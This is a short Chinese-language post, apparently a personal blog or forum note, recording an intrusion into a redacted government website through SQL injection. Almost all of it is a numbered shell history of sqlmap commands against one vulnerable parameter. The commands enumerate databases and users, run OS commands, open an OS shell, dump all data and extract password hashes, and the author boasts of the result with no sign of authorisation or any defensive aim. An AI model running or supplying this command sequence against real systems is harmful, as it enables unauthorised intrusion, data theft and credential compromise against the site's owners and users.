这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。
2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10
2006 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10
2007 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user" --threads 10
2008 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd=dir --threads 10
2009 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-shell --threads 10
2010 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dump-all --threads 10
2011 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --passwords --threads 10
mark 一下..